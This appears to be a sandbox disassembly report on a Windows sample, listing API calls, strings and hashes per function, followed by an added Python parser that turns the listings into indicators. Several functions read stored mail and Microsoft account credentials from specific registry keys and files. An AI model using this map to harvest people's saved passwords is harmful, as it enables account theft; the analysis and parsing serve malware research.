                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                          • String ID: 2t
                          • API String ID: 3662548030-3527913779
                          • Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                          • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                          • Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                          • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                          Control-flow Graph: function 0x40fb00-0x40fc3d (executed/not-executed block colouring and edge list not reproduced here)
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                          • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                            • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          • memcpy.MSVCRT ref: 0040FBE4
                          • memcpy.MSVCRT ref: 0040FBF9
                            • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                            • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                            • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                            • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                          • API String ID: 2768085393-2409096184
                          • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                          • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                          • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                          • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
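                          The per-function APIs listings on this page (for example the RegOpenKeyExA/RegQueryValueExA entries of the IdentityCRL function above) and the `$`-separated "String ID" lines follow a fixed layout, which is what makes it practical to turn a batch of these reports into structured indicators. The following is an added example, not part of the Joe Sandbox report and not code from the analysed sample: a Python parser for those two line formats that also decodes the documented Win32 constants the report prints as bare hex (0x80000001 is HKEY_CURRENT_USER, 0x20019 is KEY_READ, 0x1A is CSIDL_APPDATA, 0x104 is MAX_PATH). The sample text embedded in the block is copied from this report's own listings; the function names and the constants table are the example's own, and the example assumes that any 8-hex-digit argument is a number rather than a string literal.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One entry of a report "APIs" list, in the three shapes seen on this page:
#   • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?), ref: 0040FB31
#   • memset.MSVCRT ref: 0040832F
#     • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
ENTRY_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>\S+?)\.(?P<module>[A-Za-z0-9_]+)"   # '??3@YAXPAX@Z.MSVCRT' matches too
    r"(?:\((?P<args>[^)]*)\))?"                   # argument list is optional
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<body>.*)$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Documented Win32 values that the report prints as bare hex. Assumption of this
# example: an 8-hex-digit token is a number; an 8-character hex-looking string
# literal at a call site would be misclassified.
KNOWN_CONSTANTS = {
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x00020019: "KEY_READ",
    0x0000001A: "CSIDL_APPDATA",
    0x00000104: "MAX_PATH",
}


@dataclass
class ApiCall:
    func: str
    module: str
    ref: int                    # call-site address from the 'ref:' field
    args: List[str]             # raw argument tokens, '?' where the sandbox had no value
    subcall_of: Optional[int]   # callee address for 'Part of subcall function' entries

    def decoded_args(self) -> List[str]:
        out = []
        for a in self.args:
            if a == "?":
                out.append("?")
            elif HEX8_RE.match(a):
                v = int(a, 16)
                out.append(KNOWN_CONSTANTS.get(v, f"0x{v:X}"))
            else:
                out.append(f'"{a}"')   # string literal observed at the call site
        return out


def parse_api_entries(text: str) -> List[ApiCall]:
    """Parse every 'APIs' entry in a chunk of report text; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("func"), m.group("module"), int(m.group("ref"), 16),
                             args, int(sub, 16) if sub else None))
    return calls


def parse_string_ids(text: str) -> List[str]:
    """Split the '$'-separated 'String ID:' line(s) into individual strings (empty tokens dropped)."""
    strings = []
    for line in text.splitlines():
        m = STRING_ID_RE.match(line)
        if m:
            strings.extend(s for s in m.group("body").split("$") if s)
    return strings


def registry_names(calls: List[ApiCall]) -> List[str]:
    """Key paths and value names passed to Reg* APIs, in report order, deduplicated."""
    seen = []
    for c in calls:
        if not c.func.startswith("Reg"):
            continue
        for a in c.args:
            if a != "?" and not HEX8_RE.match(a) and a not in seen:
                seen.append(a)
    return seen


def call_sequence(calls: List[ApiCall]) -> List[str]:
    """The function's own calls ordered by call-site address (subcall entries excluded)."""
    direct = [c for c in calls if c.subcall_of is None]
    return [c.func for c in sorted(direct, key=lambda c: c.ref)]


# Constructed input: lines copied verbatim from this report's APIs / String ID listings.
SAMPLE = r"""
APIs
• RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
• RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
• RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
• memcpy.MSVCRT ref: 0040FBE4
• LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
• ??3@YAXPAX@Z.MSVCRT ref: 0040D190
• MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
Strings
• String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
"""

if __name__ == "__main__":
    parsed = parse_api_entries(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.func}.{c.module}({', '.join(c.decoded_args())})")
    print("registry names:", registry_names(parsed))
    print("strings:", parse_string_ids(SAMPLE))
```

                          Two details of the format matter when running this over whole reports: entries indented under "Part of subcall function" belong to a callee and are tagged with that callee's address rather than merged into the caller's sequence, and a "String ID" line that starts with `$` (as in the `$/deleteregkey$/savelangfile` entry on this page) yields an empty first token, which the splitter discards.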

                          Control-flow Graph: function 0x402c5d-0x402db0 (executed/not-executed block colouring and edge list not reproduced here)
                          APIs
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                          • memset.MSVCRT ref: 00402C9D
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                            • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • memset.MSVCRT ref: 00402CF7
                          • sprintf.MSVCRT ref: 00402D10
                          • sprintf.MSVCRT ref: 00402D4E
                            • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                            • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Closememset$sprintf$EnumOpen
                          • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                          • API String ID: 1831126014-3814494228
                          • Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                          • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                          • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                          • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0044430B
                            • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                            • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                          • memset.MSVCRT ref: 00444379
                          • memset.MSVCRT ref: 00444394
                            • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                          • strlen.MSVCRT ref: 004443DB
                          • _strcmpi.MSVCRT ref: 00444401
                          Strings
                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                          • \Microsoft\Windows Mail, xrefs: 00444329
                          • Store Root, xrefs: 004443A5
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                          • API String ID: 1502082548-2578778931
                          • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                          • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                          • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                          • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                          Control-flow Graph: function 0x40f460-0x40f6df (executed/not-executed block colouring and edge list not reproduced here)
                          APIs
                          • memset.MSVCRT ref: 0040F567
                          • memset.MSVCRT ref: 0040F57F
                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                          • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                            • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          • memcpy.MSVCRT ref: 0040F652
                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                          • String ID:
                          • API String ID: 2012582556-3916222277
                          • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                          • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                          • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                          • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                          Control-flow Graph: function 0x4037ca-0x4038e5 (executed/not-executed block colouring and edge list not reproduced here)
                          APIs
                          • memset.MSVCRT ref: 004037EB
                          • memset.MSVCRT ref: 004037FF
                            • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                            • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          • strchr.MSVCRT ref: 0040386E
                          • _mbscpy.MSVCRT ref: 0040388B
                          • strlen.MSVCRT ref: 00403897
                          • sprintf.MSVCRT ref: 004038B7
                          • _mbscpy.MSVCRT ref: 004038CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                          • String ID: %s@yahoo.com
                          • API String ID: 317221925-3288273942
                          • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                          • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                          • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                          • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                          Control-flow Graph: function 0x404a99-0x404b17 (executed/not-executed block colouring and edge list not reproduced here)
                          APIs
                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                          • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadMessageProc
                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                          • API String ID: 2780580303-317687271
                          • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                          • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                          • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                          • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                          Control-flow Graph

                          control_flow_graph 420 4036e5-4036f5 421 4037c6-4037c7 420->421 422 4036fb-403709 call 410863 420->422 424 40370e-403710 422->424 425 4037c5 424->425 426 403716-40372a strchr 424->426 425->421 426->425 427 403730-403787 call 4021b6 _mbscpy * 2 strlen 426->427 430 4037a4-4037c0 _mbscpy call 4023e5 427->430 431 403789-4037a1 sprintf 427->431 430->425 431->430
                          APIs
                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                            • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                            • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                          • strchr.MSVCRT ref: 0040371F
                          • _mbscpy.MSVCRT ref: 00403748
                          • _mbscpy.MSVCRT ref: 00403758
                          • strlen.MSVCRT ref: 00403778
                          • sprintf.MSVCRT ref: 0040379C
                          • _mbscpy.MSVCRT ref: 004037B2
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                          • String ID: %s@gmail.com
                          • API String ID: 3261640601-4097000612
                          • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                          • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                          • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                          • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65

                          Control-flow Graph

                          control_flow_graph 433 4034e4-403544 memset * 2 call 410b1e 436 403580-403582 433->436 437 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 433->437 437->436
                          APIs
                          • memset.MSVCRT ref: 00403504
                          • memset.MSVCRT ref: 0040351A
                            • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • _mbscpy.MSVCRT ref: 00403555
                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                          • _mbscat.MSVCRT ref: 0040356D
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscatmemset$Close_mbscpystrlen
                          • String ID: InstallPath$Software\Group Mail$fb.dat
                          • API String ID: 3071782539-966475738
                          • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                          • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                          • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                          • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                          Control-flow Graph

                          control_flow_graph 442 408db6-408dbd 443 408dc4-408dd0 442->443 444 408dbf call 408d34 442->444 446 408de2 443->446 447 408dd2-408ddb 443->447 444->443 450 408de4-408de6 446->450 448 408e0d-408e1c 447->448 449 408ddd-408de0 447->449 448->450 449->446 449->447 451 408f07 450->451 452 408dec-408df2 450->452 453 408f09-408f0b 451->453 454 408df4-408e04 452->454 455 408e1e-408e25 452->455 458 408e05-408e0b 454->458 456 408e27-408e47 _mbscpy call 409240 455->456 457 408e6b-408e7e call 408f0c 455->457 465 408e49-408e59 strlen 456->465 466 408e5b-408e69 456->466 459 408e7f-408e87 LoadStringA 457->459 458->459 464 408e89 459->464 467 408f00-408f05 464->467 468 408e8b-408e9a 464->468 465->464 465->466 466->458 467->453 468->467 469 408e9c-408ea8 468->469 469->467 470 408eaa-408efe memcpy 469->470 470->451 470->467
                          APIs
                          • _mbscpy.MSVCRT ref: 00408E31
                            • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                          • strlen.MSVCRT ref: 00408E4F
                          • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                          • memcpy.MSVCRT ref: 00408EBE
                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                          Strings
                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                          • strings, xrefs: 00408E27
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                          • API String ID: 4036804644-4125592482
                          • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                          • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                          • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                          • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                          APIs
                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                          • memcpy.MSVCRT ref: 004108C3
                          • CoTaskMemFree.OLE32(?), ref: 004108D2
                          Strings
                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                          • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FromStringUuid$FreeTaskmemcpy
                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                          • API String ID: 1640410171-3316789007
                          • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                          • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                          • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                          • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                          APIs
                            • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                          • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                          • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                            • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                            • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                          • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                          • CloseHandle.KERNELBASE(?), ref: 00444206
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                          • String ID: ACD
                          • API String ID: 1886237854-620537770
                          • Opcode ID: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                          • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                          • Opcode Fuzzy Hash: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                          • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                          • String ID:
                          • API String ID: 2054149589-0
                          • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                          • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                          • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                          • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                          APIs
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                          • memset.MSVCRT ref: 00408620
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • memset.MSVCRT ref: 00408671
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                          • RegCloseKey.ADVAPI32(?), ref: 004086D6
                          Strings
